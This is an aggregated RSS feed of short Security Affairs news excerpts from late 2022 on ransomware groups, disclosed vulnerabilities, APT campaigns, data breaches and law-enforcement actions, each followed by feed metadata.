This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-04-25T13:34:17+00:00 www.secnews.physaphae.fr Security Affairs - Blog Secu Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million U.S. Dollars (USD) and received more than $60 million in ransom payments from over 100 victims worldwide […] ]]> 2022-12-02T15:20:33+00:00 https://securityaffairs.co/wordpress/139183/cyber-crime/cuba-ransomware-alert-cisa-fbi.html www.secnews.physaphae.fr/article.php?IdArticle=8286663 False None None 2.0000000000000000 Security Affairs - Blog Secu Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively two million installs that are affected by multiple flaws (CVE-2022-45477, CVE-2022-45478, CVE-2022-45479, CVE-2022-45480, CVE-2022-45481, CVE-2022-45482, CVE-2022-45483) that can be […] ]]> 2022-12-02T11:04:39+00:00 https://securityaffairs.co/wordpress/139174/hacking/android-keyboard-apps-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=8286592 False Hack None 3.0000000000000000 Security Affairs - Blog Secu Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat actors are exploiting a critical vulnerability, tracked as CVE-2022-0543, in Redis (Remote Dictionary Server) servers. Redis (remote dictionary server) […] ]]> 2022-12-01T22:39:51+00:00 https://securityaffairs.co/wordpress/139164/malware/redigo-malware-targets-redis-servers.html www.secnews.physaphae.fr/article.php?IdArticle=8286450 False Malware,Threat None 3.0000000000000000 Security Affairs - Blog Secu Data breaches can be devastating for organizations, these are 3 of the worst incidents that could have been prevented Data breaches can be devastating for organizations and even entire countries. Eliminating the risk of a data breach is nearly impossible, but some things can be done to reduce it significantly. Here are three of the […] ]]> 2022-12-01T12:38:04+00:00 https://securityaffairs.co/wordpress/139160/data-breach/worst-data-breaches.html www.secnews.physaphae.fr/article.php?IdArticle=8286256 False Data Breach None 3.0000000000000000 Security Affairs - Blog Secu North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by North Korea-linked ScarCruft group (aka APT37, Reaper, and Group123) in attacks aimed at targets in South Korea. ScarCruft has been active since at least 2012, it made the headlines in early February 2018 when researchers […] ]]> 2022-12-01T11:02:51+00:00 https://securityaffairs.co/wordpress/139148/hacking/north-korea-scarcruft-dolphin-backdoor.html www.secnews.physaphae.fr/article.php?IdArticle=8286204 False Cloud APT 37 2.0000000000000000 Security Affairs - Blog Secu LastPass disclosed a new security breach, threat actors had access to its cloud storage using information stolen in the August 2022 breach. Password management solution LastPass disclosed a new security breach, the attackers had access to a third-party cloud storage service using information stolen in the August 2022 breach. The impacted cloud storage service is […] ]]> 2022-12-01T07:33:53+00:00 https://securityaffairs.co/wordpress/139136/data-breach/lastpass-second-security-breach.html www.secnews.physaphae.fr/article.php?IdArticle=8286161 False Threat LastPass 4.0000000000000000 Security Affairs - Blog Secu Google's Threat Analysis Group (TAG) linked three exploitation frameworks to a Spanish surveillance spyware vendor named Variston. While tracking the activities of commercial spyware vendors, Threat Analysis Group (TAG) spotted an exploitation framework likely linked Variston IT, a Spanish firm. Officially, Variston claims to provide custom security solutions and custom patches for embedded system. The […] ]]> 2022-11-30T21:35:49+00:00 https://securityaffairs.co/wordpress/139126/malware/spanish-spyware-vendor-variston.html www.secnews.physaphae.fr/article.php?IdArticle=8286073 False Threat None 2.0000000000000000 Security Affairs - Blog Secu An alleged China-linked cyberespionage group, tracked as UNC4191, used USB devices in attacks aimed at Philippines entities. Mandiant researchers spotted an alleged China-linked cyberespionage group, tracked as UNC4191, leveraging USB devices as attack vectors in campaigns aimed at Philippines entities. This campaign has been active dates as far back as September 2021 and targeted public […] ]]> 2022-11-30T11:59:44+00:00 https://securityaffairs.co/wordpress/139097/apt/unc4191-used-usb-devices.html www.secnews.physaphae.fr/article.php?IdArticle=8285862 False None None 3.0000000000000000 Security Affairs - Blog Secu CyberNews experts discovered that ENC Security, a Netherlands software company, had been leaking critical business data since May 2021. Original post at https://cybernews.com/security/encsecurity-leaked-sensitive-data/ When you buy a Sony, Lexar, or Sandisk USB key or any other storage device, it comes with an encryption solution to keep your data safe. The software is developed by a […] ]]> 2022-11-30T09:06:54+00:00 https://securityaffairs.co/wordpress/139091/data-breach/enc-security-data-leak-sony-lexar.html www.secnews.physaphae.fr/article.php?IdArticle=8285820 False None None 2.0000000000000000 Security Affairs - Blog Secu Cyble observed Initial Access Brokers (IABs) offering access to enterprise networks compromised via a critical flaw in Fortinet products. Researchers at Cyble have observed initial access brokers (IABs) selling access to enterprise networks likely compromised via a recently patched critical flaw, tracked as CVE-2022-40684, in Fortinet products. In early October, Fortinet addressed the critical authentication bypass flaw, […] ]]> 2022-11-29T22:22:23+00:00 https://securityaffairs.co/wordpress/139085/cyber-crime/iabs-offers-access-via-fortinet-products.html www.secnews.physaphae.fr/article.php?IdArticle=8285672 True None None 3.0000000000000000 Security Affairs - Blog Secu CISA added a critical flaw impacting Oracle Fusion Middleware, tracked as CVE-2021-35587, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) a critical vulnerability impacting Oracle Fusion Middleware, tracked as CVE-2021-35587 (CVSS 3.1 Base Score 9.8), to its Known Exploited Vulnerabilities Catalog. An unauthenticated attacker with network access via HTTP can exploit […] ]]> 2022-11-29T16:31:33+00:00 https://securityaffairs.co/wordpress/139077/security/oracle-fusion-middleware-flaw-known-exploited-vulnerabilities-catalog.html www.secnews.physaphae.fr/article.php?IdArticle=8282558 False Vulnerability None 3.0000000000000000 Security Affairs - Blog Secu In today's technological world, educating people about cybersecurity awareness is an absolute necessity. According to one report, 82% of data breaches involved the human element, from social attacks to misuse of technologies. These errors are not always entirely preventable, as some level of human error is inevitable, but proper training in cybersecurity awareness can greatly […] ]]> 2022-11-29T10:04:43+00:00 https://securityaffairs.co/wordpress/139073/security/gamifying-cybersecurity-awareness-training.html www.secnews.physaphae.fr/article.php?IdArticle=8278416 False None None 3.0000000000000000 Security Affairs - Blog Secu Irish data protection commission (DPC) fined Meta for not protecting Facebook’s users’ data from scraping. Meta has been fined €265 million ($275.5 million) by the Irish data protection commission (DPC) for the data leak suffered by Facebook in 2021 that exposed the data belonging to millions of Facebook users. The Data Protection Commission is also imposing […] ]]> 2022-11-29T07:32:22+00:00 https://securityaffairs.co/wordpress/139063/laws-and-regulations/irish-dpc-fines-meta-data-scraping.html www.secnews.physaphae.fr/article.php?IdArticle=8277424 False Legislation None 4.0000000000000000 Security Affairs - Blog Secu ESET announced the discovery of a vulnerability impacting Acer laptops that can allow an attacker to deactivate UEFI Secure Boot. ESET researchers announced in a series of tweets the discovery of a vulnerability impacting Acer laptops, the issue can allow an attacker to deactivate UEFI Secure Boot. The experts explained that the flaw, tracked as […] ]]> 2022-11-28T20:08:00+00:00 https://securityaffairs.co/wordpress/139055/hacking/acer-flaw-uefi-secure-boot.html www.secnews.physaphae.fr/article.php?IdArticle=8274043 False Vulnerability None 3.0000000000000000 Security Affairs - Blog Secu Amazon Web Services (AWS) fixed a cross-tenant vulnerability that could have allowed attackers to gain unauthorized access to resources. Amazon Web Services (AWS) has addressed a cross-tenant confused deputy problem in its platform that could have allowed threat actors to gain unauthorized access to resources. The problem was reported to the company by researchers from […] ]]> 2022-11-28T15:04:34+00:00 https://securityaffairs.co/wordpress/139045/hacking/amazon-web-services-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=8271710 False Vulnerability,Threat None 2.0000000000000000 Security Affairs - Blog Secu Several Ukrainian organizations were hit by Russia-based RansomBoggs Ransomware in the last week, ESET reports. Researchers from ESET observed multiple attacks involving a new family of ransomware, tracked as RansomBoggs ransomware, against Ukrainian organizations. The security firm first detected the attacks on November 21 and immediately alerted the CERT US. The ransomware is written in […] ]]> 2022-11-28T08:25:04+00:00 https://securityaffairs.co/wordpress/139028/cyber-warfare-2/ransomboggs-ransomware-targeted-ukraine.html www.secnews.physaphae.fr/article.php?IdArticle=8268903 False Ransomware None 2.0000000000000000 Security Affairs - Blog Secu The U.S. Federal Communications Commission announced it will completely ban the import of electronic equipment from Huawei, ZTE, Hytera, Hikvision, and Dahua. The U.S. Federal Communications Commission (FCC) announced the total ban for telecom and surveillance equipment from Chinese companies Huawei, ZTE, Hytera, Hikvision, and Dahua due to an “unacceptable” national security threat. The US […] ]]> 2022-11-27T12:16:06+00:00 https://securityaffairs.co/wordpress/138998/breaking-news/fcc-bans-import-chinese-equipment.html www.secnews.physaphae.fr/article.php?IdArticle=8255728 True None None 5.0000000000000000 Security Affairs - Blog Secu The massive data breach suffered by Twitter that exposed emails and phone numbers of its customers may have impacted more than five million users. At the end of July, a threat actor leaked data of 5.4 million Twitter accounts that were obtained by exploiting a now-fixed vulnerability in the popular social media platform. The threat actor offered […] ]]> 2022-11-26T21:11:03+00:00 https://securityaffairs.co/wordpress/139001/data-breach/twitter-massive-data-breach.html www.secnews.physaphae.fr/article.php?IdArticle=8244621 False Data Breach,Vulnerability,Threat None 2.0000000000000000 Security Affairs - Blog Secu Researchers discovered that devices from Dell, HP, and Lenovo are still using outdated versions of the OpenSSL cryptographic library. Binarly researchers discovered that devices from Dell, HP, and Lenovo are still using outdated versions of the OpenSSL cryptographic library. The OpenSSL software library allows secure communications over computer networks against eavesdropping or need to identify the party at the other end. […] ]]> 2022-11-26T00:35:53+00:00 https://securityaffairs.co/wordpress/138986/security/dell-hp-lenovo-openssl-outdated.html www.secnews.physaphae.fr/article.php?IdArticle=8227743 False Threat None 5.0000000000000000 Security Affairs - Blog Secu Google on Thursday released security updates to address a new zero-day vulnerability, tracked as CVE-2022-4135, impacting the Chrome web browser. Google rolled out an emergency security update for the desktop version of the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4135, that is actively exploited. The CVE-2022-4135 vulnerability is a heap […] ]]> 2022-11-25T13:50:56+00:00 https://securityaffairs.co/wordpress/138977/hacking/8-google-chrome-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=8218892 False Vulnerability None None Security Affairs - Blog Secu Cybernews investigated a data sample available for sale containing up-to-date mobile phone numbers of nearly 500 million WhatsApp users. Original post published by Cybernews: https://cybernews.com/news/whatsapp-data-leak/ On November 16, an actor posted an ad on a well-known hacking community forum, claiming they were selling a 2022 database of 487 million WhatsApp user mobile numbers. The dataset […] ]]> 2022-11-25T12:20:08+00:00 https://securityaffairs.co/wordpress/138967/data-breach/whatsapp-data-leak-500m.html www.secnews.physaphae.fr/article.php?IdArticle=8218121 False None None 3.0000000000000000 Security Affairs - Blog Secu An international law enforcement operation has dismantled an online phone number spoofing service called iSpoof. An international law enforcement operation that was conducted by authorities in Europe, Australia, the United States, Ukraine, and Canada, with the support of Europol, has dismantled online phone number spoofing service called iSpoof. The iSpoof service allowed fraudsters to impersonate trusted corporations […] ]]> 2022-11-25T10:27:00+00:00 https://securityaffairs.co/wordpress/138957/cyber-crime/police-dismantled-spoofing-service-ispoof.html www.secnews.physaphae.fr/article.php?IdArticle=8216548 False None None 2.0000000000000000 Security Affairs - Blog Secu The British government banned the installation of Chinese-linked security cameras at sensitive facilities due to security risks. Reuters reports that the British government ordered its departments to stop installing Chinese security cameras at sensitive buildings due to security risks. The Government has ordered departments to disconnect the camera from core networks and to consider removing […] ]]> 2022-11-25T06:35:47+00:00 https://securityaffairs.co/wordpress/138945/digital-id/uk-ban-chinese-security-cameras.html www.secnews.physaphae.fr/article.php?IdArticle=8213338 False Threat None 4.0000000000000000 Security Affairs - Blog Secu RansomExx ransomware is the last ransomware in order of time to have a version totally written in the Rust programming language. The operators of the RansomExx ransomware (aka Defray777 and Ransom X) have developed a new variant of their malware, tracked as RansomExx2, that was ported into the Rust programming language. The move follows the […] ]]> 2022-11-24T21:19:37+00:00 https://securityaffairs.co/wordpress/138933/malware/ransomexx-ransomware-rust-language.html www.secnews.physaphae.fr/article.php?IdArticle=8206243 False Ransomware None None Security Affairs - Blog Secu Researchers warn of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. Experts at the Cybereason Global SOC (GSOC) team have observed a surge in Qakbot infections as part of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. In the last two […] ]]> 2022-11-24T09:59:26+00:00 https://securityaffairs.co/wordpress/138924/cyber-crime/qakbot-campaign-black-basta-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=8196736 False Ransomware,Malware,Guideline None None Security Affairs - Blog Secu Microsoft reported that hackers have exploited flaws in a now-discontinued web server called Boa in attacks against critical industries. Microsoft experts believe that threat actors behind a malicious campaign aimed at Indian critical infrastructure earlier this year have exploited security flaws in a now-discontinued web server called Boa. The Boa web server is widely used across a […] ]]> 2022-11-24T08:46:59+00:00 https://securityaffairs.co/wordpress/138916/hacking/boa-web-servers-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=8195953 False Threat None None Security Affairs - Blog Secu Pro-Russian hacker collective Killnet took down the European Parliament website with a DDoS cyberattack. The Pro-Russia group of hacktivists Killnet claimed responsibility for the DDoS attack that today took down the website of the European Parliament website. “KILLNET officially recognises the European Parliament as sponsors of homosexualism,” states the group.  The attack was launched immediately […] ]]> 2022-11-23T21:20:11+00:00 https://securityaffairs.co/wordpress/138906/hacktivism/killnet-ddos-european-parliament.html www.secnews.physaphae.fr/article.php?IdArticle=8186565 False Threat None 3.0000000000000000 Security Affairs - Blog Secu The operators behind the Ducktail information stealer continue to improve their malicious code, operators experts warn. In late July 2022, researchers from WithSecure (formerly F-Secure Business) discovered an ongoing operation, named DUCKTAIL, that was targeting individuals and organizations that operate on Facebook's Business and Ads platform. Experts attribute the campaign to a Vietnamese financially motivated […] ]]> 2022-11-23T18:53:23+00:00 https://securityaffairs.co/wordpress/138894/cyber-crime/ducktail-information-stealer-evolution.html www.secnews.physaphae.fr/article.php?IdArticle=8184051 False Malware None 2.0000000000000000 Security Affairs - Blog Secu 2022-11-23T13:58:24+00:00 https://securityaffairs.co/wordpress/138884/digital-id/iphone-found-collecting-personal-data.html www.secnews.physaphae.fr/article.php?IdArticle=8180054 False None None 5.0000000000000000 Security Affairs - Blog Secu Microsoft released an out-of-band update to fix problems tied to a recent Windows security patch that caused Kerberos authentication issues. Microsoft released an out-of-band update to address issues caused by a recent Windows security patch that causes Kerberos authentication problems. Microsoft Patch Tuesday security updates for November 2022 addressed a privilege escalation vulnerability, tracked as CVE-2022-37966, […] ]]> 2022-11-23T10:28:38+00:00 https://securityaffairs.co/wordpress/138869/security/out-of-band-fix-kerberos-issues.html www.secnews.physaphae.fr/article.php?IdArticle=8177735 False None None 2.0000000000000000 Security Affairs - Blog Secu The gang behind Quantum Locker used a particular modus operandi to target large enterprises relying on cloud services in the NACE region. Executive Summary Incident Insights During the latest weeks, the Belgian company Computerland shared insights with the European threat intelligence community about Quantum TTPs adopted in recent attacks. The shared information revealed Quantum gang […] ]]> 2022-11-23T08:15:59+00:00 https://securityaffairs.co/wordpress/138873/cyber-crime/quantum-locker-lands-in-the-cloud.html www.secnews.physaphae.fr/article.php?IdArticle=8176197 False Threat None 2.0000000000000000 Security Affairs - Blog Secu Let’s give a look at API vulnerabilities by reading the API Security Top 10 published by the Open Web Application Security Project (OWASP). It's no secret that cyber security has become a leading priority for most organizations - especially those in industries that handle sensitive customer information. And as these businesses work towards building robust […] ]]> 2022-11-22T23:17:10+00:00 https://securityaffairs.co/wordpress/138879/security/5-api-vulnerabilities.html www.secnews.physaphae.fr/article.php?IdArticle=8168934 False Guideline None 3.0000000000000000 Security Affairs - Blog Secu A researcher revealed how to bypass some of the filters in Cisco Secure Email Gateway appliance and deliver malware using specially crafted emails. An anonymous researcher publicly disclosed a series of techniques to bypass some of the filters in Cisco Secure Email Gateway appliance and deliver malware using specially crafted emails. The researcher pointed out […] ]]> 2022-11-22T19:04:22+00:00 https://securityaffairs.co/wordpress/138859/security/cisco-secure-email-gateways-bypass.html www.secnews.physaphae.fr/article.php?IdArticle=8164938 False Malware None 3.0000000000000000 Security Affairs - Blog Secu Researchers warn of threat actors employing a new Go-based malware dubbed Aurora Stealer in attacks in the wild. Aurora Stealer is an info-stealing malware that was first advertised on Russian-speaking underground forums in April 2022. Aurora was offered as Malware-as-a-Service (MaaS) by a threat actor known as Cheshire. It is a multi-purpose botnet with data stealing […] ]]> 2022-11-22T15:20:06+00:00 https://securityaffairs.co/wordpress/138851/malware/aurora-stealer-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8162645 False Malware,Threat None 4.0000000000000000 Security Affairs - Blog Secu Two Estonian citizens were arrested in Tallinn for allegedly running a $575 million cryptocurrency fraud scheme. Two Estonian nationals were arrested in Tallinn, Estonia, after being indicted in the US for running a fraudulent cryptocurrency Ponzi scheme that caused more than $575 million in losses. According to the indictment, Sergei Potapenko and Ivan Turõgin, both […] ]]> 2022-11-22T10:56:32+00:00 https://securityaffairs.co/wordpress/138823/cyber-crime/estonian-575m-cryptocurrency-fraud-scheme.html www.secnews.physaphae.fr/article.php?IdArticle=8159114 False None None 4.0000000000000000 Security Affairs - Blog Secu The Emotet malware is back and experts warn of a high-volume malspam campaign delivering payloads like IcedID and Bumblebee. Proofpoint researchers warn of the return of the Emotet malware, in early November the experts observed a high-volume malspam campaign delivering payloads like IcedID and Bumblebee. The Emotet banking trojan has been active at least since 2014, the botnet is […] ]]> 2022-11-22T08:39:56+00:00 https://securityaffairs.co/wordpress/138824/cyber-crime/emotet-is-back-nov-2022.html www.secnews.physaphae.fr/article.php?IdArticle=8157805 False Malware None 3.0000000000000000 Security Affairs - Blog Secu A researcher published details and proof-of-concept (PoC) code for High-Severity macOS Sandbox escape vulnerability tracked as CVE-2022-26696. Researcher Wojciech Reguła (@_r3ggi) of SecuRing published technical details and proof-of-concept (PoC) code for a macOS sandbox escape vulnerability tracked as CVE-2022-26696 (CVSS score of 7.8). In a wrap-up published by Regula, the researcher observed that the problem is caused […] ]]> 2022-11-21T21:19:22+00:00 https://securityaffairs.co/wordpress/138815/hacking/macos-sandbox-escape-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=8152371 False Vulnerability None None Security Affairs - Blog Secu Google won a lawsuit filed against two Russian nationals involved in the operations of the Glupteba botnet. This week, Google announced it has won a nearly year-long legal battle against the Glupteba botnet. Glupteba is a highly sophisticated botnet composed of millions of compromised Windows devices. Unlike other botnets, Gluteba leverages cryptocurrency blockchains as a command-and-control mechanism […] ]]> 2022-11-21T14:33:21+00:00 https://securityaffairs.co/wordpress/138803/cyber-crime/google-lawsuit-glupteba-botnet-operators.html www.secnews.physaphae.fr/article.php?IdArticle=8149408 False None None None Security Affairs - Blog Secu Researchers at Google Cloud identified 34 different hacked release versions of the Cobalt Strike tool in the wild. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named ‘Beacon’ on the victim machine. The Beacon includes a wealth of functionality for the attacker, including, but not limited to […] ]]> 2022-11-21T11:41:21+00:00 https://securityaffairs.co/wordpress/138795/hacking/google-cobalt-strike-detection.html www.secnews.physaphae.fr/article.php?IdArticle=8147874 False Tool None None Security Affairs - Blog Secu Experts from Cyble Research and Intelligence Labs (CRIL) discovered three new ransomware families: AXLocker, Octocrypt, and Alice Ransomware. Threat intelligence firm Cyble announced the discovery of three new ransomware families named AXLocker, Octocrypt, and Alice Ransomware. The AXLocker ransomware encrypts victims’ files and steals Discord tokens from the infected machine. The analysis of the code […] ]]> 2022-11-21T08:31:12+00:00 https://securityaffairs.co/wordpress/138783/malware/octocrypt-alice-axlocker-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=8146794 False Ransomware,Threat None None Security Affairs - Blog Secu Proof-of-concept exploit code for two actively exploited Microsoft Exchange ProxyNotShell flaws released online. Proof-of-concept exploit code has been released online for two actively exploited vulnerabilities in Microsoft Exchange, known as ProxyNotShell. The two flaws are: they impact Exchange Server 2013, 2016, and 2019, an authenticated attacker can trigger them to elevate privileges to run PowerShell […] ]]> 2022-11-20T19:39:40+00:00 https://securityaffairs.co/wordpress/138768/hacking/proxynotshell-microsoft-exchange-poc.html www.secnews.physaphae.fr/article.php?IdArticle=8137402 False Ransomware None 4.0000000000000000 Security Affairs - Blog Secu Microsoft warns that a threat actor, tracked as DEV-0569, is using Google Ads to distribute the recently discovered Royal ransomware. Researchers from the Microsoft Security Threat Intelligence team warned that a threat actor, tracked as DEV-0569, is using Google Ads to distribute various payloads, including the recently discovered Royal ransomware. The DEV-0569 group carries out […] ]]> 2022-11-19T19:27:12+00:00 https://securityaffairs.co/wordpress/138750/malware/dev-0569-google-ads-royal-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=8117164 False Ransomware,Threat None None Security Affairs - Blog Secu Every year during Black Friday and Cyber Monday, crooks take advantage of the bad habits of users with fraudulent schema. Researchers at Bitdefender Antispam Lab have analyzed during the last weeks the fraudulent activities associated with Black Friday and Cyber Monday. The experts noticed that between October 26 and November 6, the rate of unsolicited […] ]]> 2022-11-19T15:56:56+00:00 https://securityaffairs.co/wordpress/138737/cyber-crime/black-friday-and-cyber-monday-scams.html www.secnews.physaphae.fr/article.php?IdArticle=8113279 False Threat None 4.0000000000000000 Security Affairs - Blog Secu Cisco Talos spotted multiple updated versions of LodaRAT that were deployed alongside other malware families, including RedLine and Neshta. Researchers from Cisco Talos have monitored the LodaRAT malware over the course of 2022 and recently discovered multiple updated versions that have been deployed alongside other malware families, including RedLine and Neshta. The versions include new […] ]]> 2022-11-19T09:22:01+00:00 https://securityaffairs.co/wordpress/138723/malware/lodarat-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8107427 False Malware None None Security Affairs - Blog Secu Atlassian addressed this week two critical vulnerabilities impacting its Crowd and Bitbucket products. Atlassian announced the release of security updates to address critical-severity vulnerabilities in its identity management platform, Crowd Server and Data Center, and in the Bitbucket Server and Data Center, a self-managed solution that provides source code collaboration for professional teams. The vulnerability in […] ]]> 2022-11-18T21:35:51+00:00 https://securityaffairs.co/wordpress/138716/security/atlassian-critical-flaws-crowd-bitbucket.html www.secnews.physaphae.fr/article.php?IdArticle=8095750 False Vulnerability None None Security Affairs - Blog Secu Hive ransomware operators have extorted over $100 million in ransom payments from over 1,300 companies worldwide as of November 2022. The threat actors behind the Hive ransomware-as-a-service (RaaS) have extorted $100 million in ransom payments from over 1,300 companies worldwide as of November 2022, reported the U.S. cybersecurity and intelligence authorities. “As of November 2022, […] ]]> 2022-11-18T11:30:22+00:00 https://securityaffairs.co/wordpress/138702/cyber-crime/hive-ransomware-extorted-100m.html www.secnews.physaphae.fr/article.php?IdArticle=8086702 False Ransomware,Threat None None Security Affairs - Blog Secu A threat actor tracked as WASP is behind an ongoing supply chain attack targeting Python developers with the WASP Stealer. Checkmarx researchers uncovered an ongoing supply chain attack conducted by a threat actor they tracked as WASP that is targeting Python developers. The attackers are using Python packages to distribute a polymorphic malware called W4SP […] ]]> 2022-11-18T08:24:14+00:00 https://securityaffairs.co/wordpress/138692/cyber-crime/wasp-stealer-supply-chain-attack.html www.secnews.physaphae.fr/article.php?IdArticle=8083972 False Malware,Threat None None Security Affairs - Blog Secu A China-based financially motivated group, tracked as Fangxiao, is behind a large-scale phishing campaign dating back as far as 2019. Researchers from Cyjax reported that a China-based financially motivated group, dubbed Fangxiao, orchestrated a large-scale phishing campaign since 2017. The sophisticated phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including […] ]]> 2022-11-18T06:19:04+00:00 https://securityaffairs.co/wordpress/138683/cyber-crime/fangxiao-phishing-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=8082168 False None None None Security Affairs - Blog Secu Public schools in two Michigan counties were forced to halt their activities, including the lessons, after a ransomware attack.   Public schools in Jackson and Hillsdale counties, Michigan, reopen after a closure of two days caused by a ransomware attack that hit its systems. The public schools started experiencing a systems outage affecting critical operating […] ]]> 2022-11-17T22:25:09+00:00 https://securityaffairs.co/wordpress/138677/cyber-crime/public-schools-michigan-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=8075013 False Ransomware None None Security Affairs - Blog Secu Researchers warn of a surge in cyberattacks targeting CVE-2022-24086, a pre-authentication issue impacting Adobe Commerce and Magento stores. In September 2022, Sansec researchers warned of a surge in hacking attempts targeting a critical Magento 2 vulnerability tracked as CVE-2022-24086. Magento is a popular open-source e-commerce platform owned by Adobe, which is used by hundreds of thousands […] ]]> 2022-11-17T16:32:32+00:00 https://securityaffairs.co/wordpress/138663/cyber-crime/trojanorders-attacks-adobe-commerce-magento.html www.secnews.physaphae.fr/article.php?IdArticle=8069985 False Vulnerability None None Security Affairs - Blog Secu A suspected leader of the Zeus cybercrime gang, Vyacheslav Igorevich Penchukov (aka Tank), was arrested by Swiss police. Swiss police last month arrested in Geneva Vyacheslav Igorevich Penchukov (40), also known as Tank, which is one of the leaders of the JabberZeus cybercrime group. “Vyacheslav “Tank” Penchukov, the accused 40-year-old Ukrainian leader of a prolific cybercriminal […] ]]> 2022-11-17T10:21:02+00:00 https://securityaffairs.co/wordpress/138648/cyber-crime/zeus-gang-leader-arrested.html www.secnews.physaphae.fr/article.php?IdArticle=8065085 False Guideline None None Security Affairs - Blog Secu Iran-linked threat actors compromised a Federal Civilian Executive Branch organization using a Log4Shell exploit and installed a cryptomining malware. According to a joint advisory published by the FBI and CISA, an Iran-linked APT group compromised a Federal Civilian Executive Branch (FCEB) organization using an exploit for the Log4Shell flaw (CVE-2021-44228) and deployed a cryptomining malware. Log4Shell impacts […] ]]> 2022-11-17T07:58:03+00:00 https://securityaffairs.co/wordpress/138639/apt/iran-compromises-us-federal-network.html www.secnews.physaphae.fr/article.php?IdArticle=8063403 False Threat None None Security Affairs - Blog Secu Researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products. Rapid7 researchers discovered several vulnerabilities in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS. The experts also discovered several bypasses of security controls that the security vendor F5 does not recognize as exploitable vulnerabilities. The […] ]]> 2022-11-16T22:02:34+00:00 https://securityaffairs.co/wordpress/138631/security/2-rce-f5-products.html www.secnews.physaphae.fr/article.php?IdArticle=8054086 False None None None Security Affairs - Blog Secu North Korea-linked Lazarus APT is using a new version of the DTrack backdoor in attacks aimed at organizations in Europe and Latin America. North Korea-linked APT Lazarus is using a new version of the DTrack backdoor to attack organizations in Europe and Latin America, Kaspersky researchers warn. DTrack is a modular backdoor used by the […] ]]> 2022-11-16T18:50:05+00:00 https://securityaffairs.co/wordpress/138622/apt/dtrack-backdoor-targets-europe-latin-america.html www.secnews.physaphae.fr/article.php?IdArticle=8051619 False None APT 38 None Security Affairs - Blog Secu Fortinet researchers discovered new samples of RapperBot used to build a botnet to launch Distributed DDoS attacks against game servers. Fortinet FortiGuard Labs researchers have discovered new samples of the RapperBot malware that are being used to build a DDoS botnet to target game servers. Researchers from FortiGuard Labs discovered the previously undetected RapperBot IoT […] ]]> 2022-11-16T11:39:15+00:00 https://securityaffairs.co/wordpress/138615/malware/rapperbot-botnet-targets-game-servers.html www.secnews.physaphae.fr/article.php?IdArticle=8045978 False Malware None None Security Affairs - Blog Secu Google announced it will roll out the Privacy Sandbox system for Android in beta to a limited number of Android 13 devices in early 2023. Google announced it will roll out the Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year. The Privacy Sandbox aims at creating technologies to […] ]]> 2022-11-16T08:18:48+00:00 https://securityaffairs.co/wordpress/138607/mobile-2/google-android-privacy-sandbox.html www.secnews.physaphae.fr/article.php?IdArticle=8043581 True None None None Security Affairs - Blog Secu 2022-11-15T23:16:16+00:00 https://securityaffairs.co/wordpress/138600/breaking-news/happy-birthday-security-affairs-11.html www.secnews.physaphae.fr/article.php?IdArticle=8035863 False None None None Security Affairs - Blog Secu Researchers discovered a critical vulnerability impacting Spotify’s Backstage Software Catalog and Developer Platform. Researchers from the security firm Oxeye discovered a critical Remote Code Execution in Spotify's Backstage (CVSS Score of 9.8). Backstage is Spotify’s open-source platform for building developer portals, it's used by a several organizations, including American Airlines, Netflix, Splunk, Fidelity Investments and Epic Games. […] ]]> 2022-11-15T22:23:01+00:00 https://securityaffairs.co/wordpress/138591/security/spotify-backstage-rce.html www.secnews.physaphae.fr/article.php?IdArticle=8034994 True Vulnerability None None Security Affairs - Blog Secu Researchers disclosed technical details of critical SQLi and access vulnerabilities in the Zendesk Explore Service. Cybersecurity researchers at Varonis disclosed technical details of critical SQLi and access vulnerabilities impacting the Zendesk Explore service. Zendesk Explore allows organizations to view and analyze key information about their customers, and their support resources. Threat actors would have allowed […] ]]> 2022-11-15T16:16:40+00:00 https://securityaffairs.co/wordpress/138579/hacking/zendesk-explore-critical-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=8029739 False Threat None None Security Affairs - Blog Secu A suspected China-linked APT group breached a digital certificate authority in Asia as part of a campaign aimed at government agencies since March 2022. State-sponsored actors compromised a digital certificate authority in a country in Asia as part of a cyber espionage campaign aimed at multiple government agencies in the region, Symantec warns. Symantec attributes […] ]]> 2022-11-15T14:08:12+00:00 https://securityaffairs.co/wordpress/138568/apt/billbug-apt-hit-certificate-authority.html www.secnews.physaphae.fr/article.php?IdArticle=8027977 False None None None Security Affairs - Blog Secu Google is going to pay $391.5 million to settle with 40 states in the U.S. for secretly collecting personal location data. Google has agreed to pay $391.5 million to settle with 40 US states for misleading users about the collection of personal location data. The settlement is the largest attorney general-led consumer privacy settlement ever, […] ]]> 